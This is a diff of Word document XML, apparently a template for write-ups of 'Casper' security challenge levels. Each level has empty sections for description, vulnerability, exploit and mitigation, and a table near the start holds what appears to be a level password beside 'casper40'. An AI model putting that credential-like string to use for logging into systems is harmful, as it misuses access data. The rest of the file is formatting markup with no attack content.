+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>tnL7L3hY0DVMqEHtrkySQ2M7XwYUNyjE</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>11</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+              <w:t>casper40</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+            <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+            <w:bookmarkEnd w:id="1"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3005" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3006" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:lang w:val="en-GB"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop1"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="2" w:name="_Toc25519920"/>
+      <w:r>
+        <w:t>Casper4</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc25519921"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Omschrijving</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="4" w:name="_Toc25519922"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="4"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="5" w:name="_Toc25519923"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Exploit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>beschrijving</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="5"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="6" w:name="_Toc25519924"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Mitigation</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="6"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="7" w:name="_Toc25519925"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Advanced level: Casper41</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="7"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop1"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc25519926"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Casper</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc25519927"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Omschrijving</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc25519928"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="10"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="11" w:name="_Toc25519929"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Exploit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>beschrijving</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="12" w:name="_Toc25519930"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Mitigation</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="13" w:name="_Toc25519931"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Advanced level: Casper</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>61</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="13"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop1"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Casper</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Omschrijving</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Exploit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>beschrijving</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Mitigation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop2"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Advanced level: Casper</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>81</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop1"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Casper</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Omschrijving</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Exploit </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>beschrijving</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop3"/>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Mitigation</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:sectPr>
+      <w:footerReference w:type="default" r:id="rId9"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:pgNumType w:start="0"/>
@@ -352,6 +2260,376 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:sdt>
+    <w:sdtPr>
+      <w:id w:val="28153611"/>
+      <w:docPartObj>
+        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
+        <w:docPartUnique/>
+      </w:docPartObj>
+    </w:sdtPr>
+    <w:sdtContent>
+      <w:p>
+        <w:pPr>
+          <w:pStyle w:val="Voettekst"/>
+          <w:jc w:val="right"/>
+        </w:pPr>
+        <w:r>
+          <w:fldChar w:fldCharType="begin"/>
+        </w:r>
+        <w:r>
+          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
+        </w:r>
+        <w:r>
+          <w:fldChar w:fldCharType="separate"/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:lang w:val="nl-NL"/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:fldChar w:fldCharType="end"/>
+        </w:r>
+      </w:p>
+    </w:sdtContent>
+  </w:sdt>
+  <w:p>
